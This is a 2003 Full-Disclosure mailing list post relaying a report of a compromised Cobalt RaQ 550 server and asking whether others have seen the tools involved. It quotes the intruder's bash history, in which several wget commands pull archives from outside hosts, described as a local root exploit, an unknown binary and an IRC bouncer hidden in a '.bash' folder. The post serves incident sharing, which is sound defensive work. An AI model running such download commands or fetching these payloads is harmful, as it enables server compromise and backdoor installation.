[Full-Disclosure] raq 550 compromised
adf at code511.com
Tue Oct 7 02:37:24 BST 2003
Sorry for the "cross-post"; I just saw this message on the cobalt-security
mailing list today:
A user got his RaQ 550 compromised and he posted some bash history he
found:
-wget www.ps-lov.us/pizda.tgz
:unknown binaries (yet?) named "mumu"
-wget snow.prohosting.com/muiemuie/p.tar.gz
:Linux kernel ptrace/kmod local root exploit from ipsec
-wget snow.prohosting.com/muiemuie/p.tgz
:it will decompress psybnc in a hidden folder (.bash)
-wget snow.prohosting.com/muiemuie/km3.tgz ----->(file offline)
-wget 65.113.119.133/muiemuie/km3.tgz ----->(file offline)
Anyone seen pizda or mumu?
If you are interested in all the details of the post:
http://list.cobalt.com/pipermail/cobalt-security/2003-October/008607.html
-deepquest
Full-Disclosure is hosted and sponsored by Secunia.